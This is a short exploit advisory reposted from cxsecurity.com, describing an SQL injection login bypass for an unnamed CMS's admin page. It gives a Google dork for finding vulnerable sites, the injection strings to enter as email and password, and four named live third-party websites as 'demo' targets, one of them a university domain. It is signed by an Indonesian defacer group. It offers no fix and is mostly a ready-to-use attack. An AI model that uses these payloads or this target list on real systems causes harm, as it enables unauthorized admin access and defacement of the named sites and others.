CMS Nemu Bypass Login Admin Vulnerability

Published
Credit
Risk
2017.03.12
Berandal | OWL SQUAD
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:/media.php?hal=login

#################################################################################
# CMS Nemu Bypass Login Admin Vulnerability
# Author : Berandal
# Google Dork: inurl:/media.php?hal=login
# Tested on: Win 7, Linux
# Blog : http://www.maxteroit.com/
#################################################################################
+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+
#################################################################################
[!] Proof:
ini POC nemu sat :v
Gua juga gatau nama CMS nya :v
-
Admin Url: http://127.0.0.1/media.php?hal=login
-
Email: '=''or'@gmail.com
Pass: '=''or'
########################################################################
[!] Demo:
http://preteli.com/media.php?hal=login
http://www.xventure19.com/media.php?hal=login
http://tracerstudy.mpwk.undip.ac.id/media.php?hal=login
http://hellmoartwear.com/media.php?hal=login
########################################################################
[!] About:
# Facebook: https://www.facebook.com/owlsquad.id
# Twitter: https://www.twitter.com/id_berandal
# Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.
#################################################################################

References:

http://www.maxteroit.com/
https://www.facebook.com/owlsquad.id/
https://twitter.com/id_berandal


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com